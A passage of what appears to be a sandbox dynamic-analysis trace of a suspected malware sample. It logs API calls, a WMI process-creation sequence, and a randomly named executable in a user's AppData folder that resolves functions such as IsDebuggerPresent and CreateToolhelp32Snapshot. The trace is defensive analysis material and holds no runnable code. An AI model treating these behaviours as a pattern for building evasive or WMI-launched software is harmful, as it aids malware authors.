lFlags=0, pCtx=0x0, pInParams=0x243a130, ppOutParams=0x23bfa0*=0x0, ppCallResult=0x0 | out: ppOutParams=0x23bfa0*=0x243af20, ppCallResult=0x0) returned 0x0 [0100.526] IWbemClassObject:BeginEnumeration (This=0x2439dc0, lEnumFlags=64) returned 0x0 [0100.527] IWbemClassObject:Next (in: This=0x2439dc0, lFlags=0, strName=0x23bf50*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x23bf50*="ProcessId", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0100.527] IWbemClassObject:Get (in: This=0x243af20, wszName="ProcessId", lFlags=0, pVal=0x23bec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x499ab8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x23bec8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x83c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.527] _wcsicmp (_String1="ProcessId", _String2="ReturnValue") returned -2 [0100.527] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2439dc0, wszProperty="ProcessId", ppQualSet=0x23bec0 | out: ppQualSet=0x23bec0*=0x2421740) returned 0x0 [0100.527] IWbemQualifierSet:Get (in: This=0x2421740, wszName="id", lFlags=0, pVal=0x23bef8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x49a2d8), plFlavor=0x0 | out: pVal=0x23bef8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffffffff00000003, varVal2=0x49a2d8), plFlavor=0x0) returned 0x0 [0100.527] IUnknown:Release (This=0x2421740) returned 0x0 [0100.527] IWbemClassObject:Next (in: This=0x2439dc0, lFlags=0, strName=0x23bf50*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x23bf50*="ReturnValue", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0100.527] IWbemClassObject:Get (in: This=0x243af20, wszName="ReturnValue", lFlags=0, pVal=0x23bec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x83c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x23bec8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.527] _wcsicmp (_String1="ReturnValue", _String2="ReturnValue") returned 0 [0100.527] IWbemClassObject:Next (in: This=0x2439dc0, lFlags=0, strName=0x23bf50*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x23bf50*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x40005 [0100.527] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x23bed0 | out: pperrinfo=0x23bed0*=0x0) returned 0x1 [0100.527] IUnknown:Release (This=0x243af20) returned 0x0 [0100.528] WbemLocator:IUnknown:Release (This=0x2433ad8) returned 0x2 [0100.528] IUnknown:Release (This=0x243a130) returned 0x0 [0100.528] IUnknown:Release (This=0x2439dc0) returned 0x0 [0100.528] IUnknown:Release (This=0x24213d0) returned 0x0 [0100.528] IUnknown:Release (This=0x492ca8) returned 0x1 [0100.528] GetCurrentThreadId () returned 0x274 [0100.528] ISystemDebugEventFire:IsActive (This=0x45f970) returned 0x1 [0100.529] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.529] free (_Block=0x4084c0) [0100.530] GetUserDefaultLCID () returned 0x409 [0100.530] GetACP () returned 0x4e4 [0100.530] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23e068 | out: ppv=0x23e068*=0x450060) returned 0x0 [0100.530] IUnknown:Release (This=0x2438c00) returned 0x2 [0100.530] WbemLocator:IUnknown:Release (This=0x2433ad8) returned 0x1 [0100.530] WbemLocator:IUnknown:Release (This=0x2433ad8) returned 0x0 [0100.531] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.531] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.531] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.531] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.531] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.531] IUnknown:Release (This=0x2438c00) returned 0x1 [0100.531] IUnknown:Release (This=0x2438c00) returned 0x0 [0100.531] IUnknown:Release (This=0x492ca8) returned 0x0 [0100.532] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.533] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.533] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.533] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.533] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.533] free (_Block=0x40a490) [0100.533] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.533] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.533] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.533] MulDiv (nNumber=4, nNumerator=100, nDenominator=8) returned 50 [0100.533] IUnknown:Release (This=0x450060) returned 0x1 [0100.533] GetTickCount () returned 0x115279d [0100.533] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23e068 | out: ppv=0x23e068*=0x450060) returned 0x0 [0100.533] MulDiv (nNumber=0, nNumerator=100, nDenominator=4) returned 0 [0100.533] IUnknown:Release (This=0x450060) returned 0x1 [0100.533] GetTickCount () returned 0x115279d [0100.533] ISystemDebugEventFire:EndSession (This=0x45f970) returned 0x0 [0100.533] IUnknown:Release (This=0x45f970) returned 0x1 [0100.533] IUnknown:Release (This=0x45f970) returned 0x0 [0100.534] free (_Block=0x408640) [0100.534] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.534] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.534] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23e128 | out: ppv=0x23e128*=0x450060) returned 0x0 [0100.534] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.534] free (_Block=0x409fa0) [0100.534] free (_Block=0x40a920) [0100.534] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.534] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.535] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.535] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.535] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.535] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefe48a1b0, dwCookie=0x100) returned 0x0 [0100.535] IUnknown:Release (This=0x409690) returned 0x1 [0100.535] IUnknown:Release (This=0x450060) returned 0x1 [0100.535] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.535] IUnknown:Release (This=0x450060) returned 0x0 [0100.541] swprintf_s (in: _Dst=0x23f010, _SizeInWords=0x400, _Format="0x%08lx" | out: _Dst="0x80020006") returned 10 [0100.541] FreeLibrary (hLibModule=0x7fef8650000) returned 1 [0100.542] OleUninitialize () [0100.543] DllCanUnloadNow () returned 0x0 [0100.543] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.543] FreeLibrary (hLibModule=0x7fefdbf0000) returned 1 [0100.543] DllCanUnloadNow () returned 0x1 [0100.543] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0100.543] free (_Block=0x40ac50) [0100.552] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="UnregisterTraceGuids") returned 0x76f73c80 [0100.552] EtwEventUnregister (RegHandle=0x800010001) returned 0x0 [0100.552] EtwEventUnregister (RegHandle=0x900010001) returned 0x0 [0100.552] ??3@YAXPEAX@Z () returned 0x111c1701 [0100.552] free (_Block=0x4066d0) [0100.555] exit (_Code=5) Thread: id = 126 os_tid = 0x724 Thread: id = 127 os_tid = 0x318 Thread: id = 128 os_tid = 0x774 Thread: id = 129 os_tid = 0x794 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x790" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 88 os_tid = 0xad4 Thread: id = 89 os_tid = 0xad0 Thread: id = 90 os_tid = 0xac8 Thread: id = 91 os_tid = 0xa30 Thread: id = 92 os_tid = 0xa2c Thread: id = 93 os_tid = 0xa24 Thread: id = 94 os_tid = 0xa20 Thread: id = 95 os_tid = 0x408 Thread: id = 96 os_tid = 0x430 Thread: id = 97 os_tid = 0x268 Thread: id = 98 os_tid = 0x764 Thread: id = 99 os_tid = 0x75c Thread: id = 100 os_tid = 0x70c Thread: id = 101 os_tid = 0x6e8 Thread: id = 102 os_tid = 0x6c0 Thread: id = 103 os_tid = 0x6b8 Thread: id = 104 os_tid = 0x6a4 Thread: id = 105 os_tid = 0x6a0 Thread: id = 106 os_tid = 0x690 Thread: id = 107 os_tid = 0x67c Thread: id = 108 os_tid = 0x490 Thread: id = 109 os_tid = 0x454 Thread: id = 110 os_tid = 0x450 Thread: id = 111 os_tid = 0x428 Thread: id = 112 os_tid = 0x424 Thread: id = 113 os_tid = 0x420 Thread: id = 114 os_tid = 0x404 Thread: id = 115 os_tid = 0x18c Thread: id = 116 os_tid = 0xf0 Thread: id = 117 os_tid = 0x3f0 Thread: id = 118 os_tid = 0x3e4 Thread: id = 119 os_tid = 0x398 Thread: id = 120 os_tid = 0x394 Thread: id = 121 os_tid = 0x390 Thread: id = 122 os_tid = 0x38c Thread: id = 123 os_tid = 0x378 Thread: id = 124 os_tid = 0x370 Thread: id = 130 os_tid = 0x11c Thread: id = 131 os_tid = 0x7a0 Thread: id = 151 os_tid = 0x808 Thread: id = 152 os_tid = 0x900 Thread: id = 153 os_tid = 0x904 Thread: id = 154 os_tid = 0x33c Thread: id = 156 os_tid = 0x914 Thread: id = 157 os_tid = 0x910 Thread: id = 197 os_tid = 0x97c Thread: id = 282 os_tid = 0x308 Thread: id = 283 os_tid = 0x3a0 Thread: id = 300 os_tid = 0x228 Thread: id = 308 os_tid = 0xab8 Thread: id = 309 os_tid = 0x444 Process: id = "8" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65e05000" os_pid = "0x6b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 132 os_tid = 0xa28 Thread: id = 133 os_tid = 0x344 Thread: id = 134 os_tid = 0x694 Thread: id = 135 os_tid = 0x128 Thread: id = 136 os_tid = 0x6a8 Thread: id = 137 os_tid = 0x130 Thread: id = 138 os_tid = 0x714 Thread: id = 139 os_tid = 0x494 Thread: id = 150 os_tid = 0x80c Thread: id = 310 os_tid = 0x2ec Thread: id = 311 os_tid = 0x74c Process: id = "9" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x54d1a000" os_pid = "0x6ac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00058c72" [0xc000000f] Thread: id = 140 os_tid = 0x7b8 Thread: id = 141 os_tid = 0x3b0 Thread: id = 142 os_tid = 0x618 Thread: id = 143 os_tid = 0x15c Thread: id = 144 os_tid = 0x7a8 Thread: id = 145 os_tid = 0x288 Thread: id = 146 os_tid = 0x2a8 Thread: id = 147 os_tid = 0x2b0 Thread: id = 155 os_tid = 0x918 Thread: id = 284 os_tid = 0x4fc Thread: id = 303 os_tid = 0xab0 Process: id = "10" image_name = "gtjtdfe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe" page_root = "0x551e3000" os_pid = "0x83c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6ac" cmd_line = "\"C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 148 os_tid = 0x7bc [0100.447] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0100.447] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleMode") returned 0x76c4a77d [0100.447] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleInputA") returned 0x76cd6f53 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0100.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleCount") returned 0x76c3cb29 [0100.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedDecrement") returned 0x76c313f0 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0100.450] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0100.451] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathA") returned 0x76c5276c [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileA") returned 0x76c5d53e [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempFileNameA") returned 0x76c59d3f [0100.452] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileA") returned 0x76c3e2ce [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLanguageGroupsA") returned 0x76cc51fa [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventA") returned 0x76c3328c [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0100.453] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSetInformation") returned 0x76c35651 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleTitleA") returned 0x76cd67e3 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameA") returned 0x76c3e2c1 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeW") returned 0x76c3418b [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryA") returned 0x76c41834 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryA") returned 0x76c5d4f6 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryW") returned 0x76c41260 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryW") returned 0x76c35611 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedIncrement") returned 0x76c31400 [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="GetWindowsDirectoryA") returned 0x76c52b0a [0100.454] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0100.455] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0100.455] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0100.455] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0100.455] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0100.455] LoadLibraryA (lpLibFileName="ACTIVEDS.dll") returned 0x74b10000 [0100.455] GetProcAddress (hModule=0x74b10000, lpProcName=0x1d) returned 0x74b16d3d [0100.455] GetProcAddress (hModule=0x74b10000, lpProcName=0x1e) returned 0x74b16d83 [0100.455] LoadLibraryA (lpLibFileName="AVIFIL32.dll") returned 0x74a90000 [0100.455] GetProcAddress (hModule=0x74a90000, lpProcName="AVIFileCreateStreamA") returned 0x74a96198 [0100.455] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0100.455] GetProcAddress (hModule=0x75ad0000, lpProcName="GetTextExtentPoint32A") returned 0x75aed349 [0100.455] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportOrgEx") returned 0x75ae86cc [0100.455] GetProcAddress (hModule=0x75ad0000, lpProcName="LineTo") returned 0x75aeb9e5 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="SetWindowExtEx") returned 0x75af1ace [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="ExcludeClipRect") returned 0x75aea066 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="SetMapMode") returned 0x75aeb02f [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="Ellipse") returned 0x75b14492 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="CreatePen") returned 0x75aeba4f [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportExtEx") returned 0x75af19e2 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateICA") returned 0x75ae7c2e [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="SetPixelFormat") returned 0x75b1594c [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="GetStockObject") returned 0x75ae4eb8 [0100.456] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateSolidBrush") returned 0x75ae4f17 [0100.457] GetProcAddress (hModule=0x75ad0000, lpProcName="TextOutA") returned 0x75aeeda3 [0100.457] GetProcAddress (hModule=0x75ad0000, lpProcName="MoveToEx") returned 0x75ae8ee6 [0100.457] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x747e0000 [0100.457] GetProcAddress (hModule=0x747e0000, lpProcName="GdiplusStartup") returned 0x74805600 [0100.457] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0100.457] GetProcAddress (hModule=0x75220000, lpProcName=0x1a5) returned 0x752526fa [0100.457] LoadLibraryA 